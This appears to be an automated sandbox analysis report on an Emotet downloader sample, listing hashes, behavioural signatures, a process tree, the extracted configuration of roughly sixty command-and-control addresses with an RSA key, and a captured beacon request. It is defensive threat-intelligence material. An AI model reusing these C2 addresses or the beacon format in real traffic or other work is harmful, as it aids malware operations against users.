
Analysis Report SecuriteInfo.com.Trojan.DownLoader34.14215.6565.8121

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.8121 (renamed file extension from 8121 to exe)
Analysis ID: 255721
MD5: 556984bce9f182c5b2129469ee3d6a5c
SHA1: 54dfec53ef5204ab24466095e5a98496ec0381bf
SHA256: 6c30ca2d6217c2098b476c04357dedb93e1857ebf5ff25fb01723d9174580b06

Most interesting Screenshot:

Detection

Emotet
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • svchost.exe (PID: 1876 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6156 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6572 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6612 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 396 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 1884 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6512 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 1072 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 4876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 5604 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6448 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["187.64.128.197:80", "198.57.203.63:8080", "163.172.107.70:8080", "212.112.113.235:80", "157.7.164.178:8081", "181.167.35.84:80", "212.156.133.218:80", "185.142.236.163:443", "181.143.101.19:8080", "75.127.14.170:8080", "115.165.3.213:80", "190.55.233.156:80", "139.59.12.63:8080", "144.139.91.187:80", "37.70.131.107:80", "181.113.229.139:443", "41.185.29.128:8080", "177.37.81.212:443", "5.79.70.250:8080", "78.188.170.128:80", "190.111.215.4:8080", "50.116.78.109:8080", "75.139.38.211:80", "140.207.113.106:443", "192.241.220.183:8080", "192.210.217.94:8080", "81.17.93.134:80", "181.164.110.7:80", "190.164.75.175:80", "201.214.108.231:80", "94.96.60.191:80", "192.163.221.191:8080", "91.83.93.103:443", "51.38.201.19:7080", "24.157.25.203:80", "81.214.253.80:443", "87.106.231.60:8080", "37.46.129.215:8080", "195.201.56.70:8080", "201.235.10.215:80", "107.161.30.122:8080", "113.160.180.109:80", "87.252.100.28:80", "115.79.195.246:80", "113.161.148.81:80", "74.208.173.91:8080", "46.105.131.68:8080", "172.105.78.244:8080", "189.146.1.78:443", "216.75.37.196:8080", "203.153.216.182:7080", "153.220.182.49:80", "181.134.9.162:80", "178.33.167.120:8080", "46.49.124.53:80", "143.95.101.72:8080", "77.74.78.80:443", "203.153.216.178:7080", "179.5.118.12:80", "24.232.36.99:80", "177.144.130.105:443", "46.32.229.152:8080", "89.108.158.234:8080"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ\ncMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j\nl32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.488528706.0000000000700000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000000.00000002.226321958.0000000002270000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000000.00000002.226329464.0000000002281000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000001.00000002.488556425.0000000000711000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000001.00000002.488528706.0000000000700000.00000040.00000001.sdmp Malware Configuration Extractor: Emotet {"C2 list": ["187.64.128.197:80", "198.57.203.63:8080", "163.172.107.70:8080", "212.112.113.235:80", "157.7.164.178:8081", "181.167.35.84:80", "212.156.133.218:80", "185.142.236.163:443", "181.143.101.19:8080", "75.127.14.170:8080", "115.165.3.213:80", "190.55.233.156:80", "139.59.12.63:8080", "144.139.91.187:80", "37.70.131.107:80", "181.113.229.139:443", "41.185.29.128:8080", "177.37.81.212:443", "5.79.70.250:8080", "78.188.170.128:80", "190.111.215.4:8080", "50.116.78.109:8080", "75.139.38.211:80", "140.207.113.106:443", "192.241.220.183:8080", "192.210.217.94:8080", "81.17.93.134:80", "181.164.110.7:80", "190.164.75.175:80", "201.214.108.231:80", "94.96.60.191:80", "192.163.221.191:8080", "91.83.93.103:443", "51.38.201.19:7080", "24.157.25.203:80", "81.214.253.80:443", "87.106.231.60:8080", "37.46.129.215:8080", "195.201.56.70:8080", "201.235.10.215:80", "107.161.30.122:8080", "113.160.180.109:80", "87.252.100.28:80", "115.79.195.246:80", "113.161.148.81:80", "74.208.173.91:8080", "46.105.131.68:8080", "172.105.78.244:8080", "189.146.1.78:443", "216.75.37.196:8080", "203.153.216.182:7080", "153.220.182.49:80", "181.134.9.162:80", "178.33.167.120:8080", "46.49.124.53:80", "143.95.101.72:8080", "77.74.78.80:443", "203.153.216.178:7080", "179.5.118.12:80", "24.232.36.99:80", "177.144.130.105:443", "46.32.229.152:8080", "89.108.158.234:8080"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ\ncMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j\nl32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB"}
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe Code function: 0_2_0042853B __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,0_2_0042853B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe Code function: 0_2_004026E0 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,0_2_004026E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe Code function: 0_2_00428B68 lstrlenA,FindFirstFileA,FindClose,0_2_00428B68
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe Code function: 0_2_00401640 FindFirstFileA,FindClose,0_2_00401640
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe Code function: 0_2_022828B7 FindFirstFileW,FindNextFileW,FindClose,0_2_022828B7
Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe Code function: 1_2_0042853B __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,1_2_0042853B
Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe Code function: 1_2_004026E0 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,1_2_004026E0
Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe Code function: 1_2_00428B68 lstrlenA,FindFirstFileA,FindClose,1_2_00428B68
Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe Code function: 1_2_00401640 FindFirstFileA,FindClose,1_2_00401640

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404324 ET CNC Feodo Tracker Reported CnC Server TCP group 13 192.168.2.4:49723 -> 198.57.203.63:8080
Source: global traffic TCP traffic: 192.168.2.4:49723 -> 198.57.203.63:8080
Source: global traffic TCP traffic: 192.168.2.4:49714 -> 187.64.128.197:80
Source: global traffic HTTP traffic detected:
  POST /CDVLjF8CqA3AEb/ HTTP/1.1
  Referer: http://198.57.203.63/CDVLjF8CqA3AEb/
  Content-Type: multipart/form-data; boundary=---------------------------677737143348962
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 198.57.203.63:8080
  Content-Length: 4580
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 187.64.128.197
Source: unknown TCP traffic detected without corresponding DNS query: 187.64.128.197
Source: unknown TCP traffic detected without corresponding DNS query: 187.64.128.197
Source: unknown TCP traffic detected without corresponding DNS query: 198.57.203.63
Source: unknown TCP traffic detected without corresponding DNS query: 198.57.203.63
Source: unknown TCP traffic detected without corresponding DNS query: 198.57.203.63
Source: unknown TCP traffic detected without corresponding DNS query: 198.57.203.63
Source: unknown TCP traffic detected without corresponding DNS query: 198.57.203.63
Source: unknown TCP traffic detected without corresponding DNS query: 198.57.203.63
Source: unknown TCP traffic detected without corresponding DNS query: 198.57.203.63
Source: unknown TCP traffic detected without corresponding DNS query: 198.57.203.63
Source: unknown TCP traffic detected without corresponding DNS query: 198.57.203.63
Source: unknown TCP traffic detected without corresponding DNS query: 198.57.203.63
Source: unknown TCP traffic detected without corresponding DNS query: 198.57.203.63
          Source: svchost.exe, 0000000F.00000003.386930124.0000015B9694A000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
          Source: svchost.exe, 0000000F.00000003.386930124.0000015B9694A000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
          Source: svchost.exe, 0000000F.00000003.386885941.0000015B96964000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","
SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF"},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-07-27T07:14:35.6749414Z||.||121f780f-ffc5-478c-bf53-6b53ed02cb1e||1152921505690835751||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2020-07-27T07:13:24.2771771Z","LocalizedProperties":[{"SkuDescript
          Source: svchost.exe, 0000000F.00000003.386885941.0000015B96964000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","
SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF"},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-07-27T07:14:35.6749414Z||.||121f780f-ffc5-478c-bf53-6b53ed02cb1e||1152921505690835751||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2020-07-27T07:13:24.2771771Z","LocalizedProperties":[{"SkuDescript
          Source: svchost.exe, 0000000F.00000003.386905404.0000015B9695B000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN"," equals www.facebook.com (Facebook)
          Source: svchost.exe, 0000000F.00000003.386905404.0000015B9695B000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN"," equals www.twitter.com (Twitter)
Source: unknown HTTP traffic detected:
  POST /CDVLjF8CqA3AEb/ HTTP/1.1
  Referer: http://198.57.203.63/CDVLjF8CqA3AEb/
  Content-Type: multipart/form-data; boundary=---------------------------677737143348962
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 198.57.203.63:8080
  Content-Length: 4580
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: bcryptprimitives.exe, 00000001.00000002.491630602.0000000002852000.00000004.00000001.sdmp String found in binary or memory: http://187.64.128.197/stuk9tIC/nEGJJNQ1hPRK6JQiF/87YRAVuaYuO7m/
Source: bcryptprimitives.exe, 00000001.00000002.491630602.0000000002852000.00000004.00000001.sdmp String found in binary or memory: http://187.64.128.197/stuk9tIC/nEGJJNQ1hPRK6JQiF/87YRAVuaYuO7m/y$
Source: bcryptprimitives.exe, 00000001.00000002.491680507.0000000002864000.00000004.00000001.sdmp String found in binary or memory: http://198.57.203.63/CDVLjF8CqA3AEb/
Source: bcryptprimitives.exe, 00000001.00000002.491680507.0000000002864000.00000004.00000001.sdmp String found in binary or memory: http://198.57.203.63:8080/CDVLjF8CqA3AEb/
Source: bcryptprimitives.exe, 00000001.00000002.491680507.0000000002864000.00000004.00000001.sdmp String found in binary or memory: http://198.57.203.63:8080/CDVLjF8CqA3AEb/=
Source: bcryptprimitives.exe, 00000001.00000002.491630602.0000000002852000.00000004.00000001.sdmp String found in binary or memory: http://198.57.203.63:8080/CDVLjF8CqA3AEb/K6JQiF/87YRAVuaYuO7m/
Source: svchost.exe, 00000004.00000002.491328545.000002935E212000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.388392239.0000015B9693C000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: svchost.exe, 00000004.00000002.491328545.000002935E212000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.388392239.0000015B9693C000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000004.00000002.491328545.000002935E212000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.388392239.0000015B9693C000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: svchost.exe, 00000004.00000002.490956253.000002935E180000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: svchost.exe, 00000008.00000002.303564842.000001EAE4613000.00000004.00000001.sdmp String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000008.00000003.303261107.000001EAE4660000.00000004.00000001.sdmp String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000008.00000003.303282922.000001EAE464B000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000008.00000003.303261107.000001EAE4660000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000008.00000002.303656860.000001EAE463E000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000008.00000003.303261107.000001EAE4660000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000008.00000003.303214683.000001EAE464F000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000008.00000003.281314548.000001EAE4630000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000008.00000003.281314548.000001EAE4630000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000008.00000003.281314548.000001EAE4630000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000008.00000002.303656860.000001EAE463E000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000008.00000003.303261107.000001EAE4660000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000008.00000003.303261107.000001EAE4660000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000008.00000003.303261107.000001EAE4660000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000008.00000003.281314548.000001EAE4630000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000008.00000003.303345773.000001EAE4641000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000008.00000003.303345773.000001EAE4641000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000008.00000003.303261107.000001EAE4660000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000008.00000003.303312796.000001EAE4646000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000008.00000003.281314548.000001EAE4630000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=
